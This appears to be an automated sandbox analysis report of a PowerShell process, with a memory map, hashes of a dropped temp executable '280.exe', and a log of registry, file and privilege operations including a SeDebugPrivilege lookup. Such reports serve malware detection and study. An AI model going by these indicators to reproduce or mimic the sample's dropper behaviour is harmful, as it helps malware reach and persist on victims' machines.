pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x00080000 0x00082fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001cffff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000240000 0x00240000 0x00240fff Pagefile Backed Memory Readable True False False -
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00260000 0x0027efff Memory Mapped File Readable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory - True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory - True False False -
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory - True False False -
private_0x0000000000360000 0x00360000 0x0036ffff Private Memory - True False False -
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory - True False False -
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000500000 0x00500000 0x00687fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000690000 0x00690000 0x00810fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000820000 0x00820000 0x01c1ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001c20000 0x01c20000 0x01cfefff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False -
private_0x0000000001fd0000 0x01fd0000 0x01fdffff Private Memory - True False False -
private_0x0000000001fe0000 0x01fe0000 0x0201ffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0202ffff Private Memory Readable, Writable True False False -
l_intl.nls 0x02030000 0x02032fff Memory Mapped File Readable False False False -
private_0x0000000002040000 0x02040000 0x02040fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x02050000 0x02054fff Memory Mapped File Readable False False False -
microsoft.wsman.runtime.dll 0x02060000 0x02067fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000002070000 0x02070000 0x02070fff Pagefile Backed Memory Readable True False False -
private_0x0000000002080000 0x02080000 0x020bffff Private Memory Readable, Writable True False False -
private_0x00000000020c0000 0x020c0000 0x021bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021c0000 0x021c0000 0x025b2fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000025c0000 0x025c0000 0x025c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000025d0000 0x025d0000 0x0260ffff Private Memory Readable, Writable True False False -
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False -
private_0x00000000026a0000 0x026a0000 0x026dffff Private Memory Readable, Writable True False False -
sortkey.nlp 0x026e0000 0x02720fff Memory Mapped File Readable False False False -
private_0x0000000002740000 0x02740000 0x0277ffff Private Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027effff Private Memory Readable, Writable True False False -
private_0x00000000027f0000 0x027f0000 0x0288ffff Private Memory Readable, Writable True False False -
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False -
system.transactions.dll 0x02900000 0x02942fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000002990000 0x02990000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable, Executable True False False -
private_0x00000000029f0000 0x029f0000 0x049effff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x049f0000 0x04aaffff Memory Mapped File Readable, Writable False False False -
private_0x0000000004ae0000 0x04ae0000 0x04b1ffff Private Memory Readable, Writable True False False -
system.management.automation.dll 0x04b20000 0x04e01fff Memory Mapped File Readable, Writable, Executable False False False -
powershell.exe 0x21c10000 0x21c81fff Memory Mapped File Readable, Writable, Executable False False False -
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.commands.management.ni.dll 0x6d7f0000 0x6d8b2fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.commands.utility.ni.dll 0x6d8c0000 0x6da5dfff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x6da60000 0x6dafbfff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.wsman.management.ni.dll 0x6db00000 0x6db84fff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x6db90000 0x6ddc4fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x6ddd0000 0x6e649fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.dll 0x6e650000 0x6e931fff Memory Mapped File Readable, Writable, Executable False False False -
system.ni.dll 0x6e940000 0x6f0dbfff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x6f0e0000 0x6fbd7fff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x6fbe0000 0x7018afff Memory Mapped File Readable, Writable, Executable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x70420000 0x7044dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74330000 0x7437bfff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x743d0000 0x744c4fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x74650000 0x746c9fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x746d0000 0x74719fff Memory Mapped File Readable, Writable, Executable True False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74cb0000 0x74d4afff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
system.configuration.install.ni.dll 0x75170000 0x75194fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x751a0000 0x751eafff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x751f0000 0x75270fff Memory Mapped File Readable, Writable, Executable True False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x752b0000 0x752c3fff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x75330000 0x75339fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x75340000 0x7534afff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x75350000 0x75368fff Memory Mapped File Readable, Writable, Executable False False False -
ntshrui.dll 0x75370000 0x753dffff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x753e0000 0x753e8fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 89 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\280.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\local\temp\280.exe 104.00 KB MD5: bc1a4dc38f3236982d47496a1151f33f
SHA1: d112719238664d7996048614d75db8a67fc50fc5
SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473
False
Threads
Thread 0xa0c
550 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 3
Fn
File Get Info filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 2048 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment Get Environment String name = MshEnableTrace False 3
Fn
File Get Info filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 9
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.config, type = file_attributes False 1
Fn
Environment Get Environment String name = MshEnableTrace False 6
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = MshEnableTrace False 9
Fn
Environment Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Environment True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Environment Set Environment String name = PSMODULEPATH, value = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ True 2
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 True 3
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
System Get Info type = Hardware Information True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 True 41
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ True 2
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 4
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 True 5
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 True 17
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
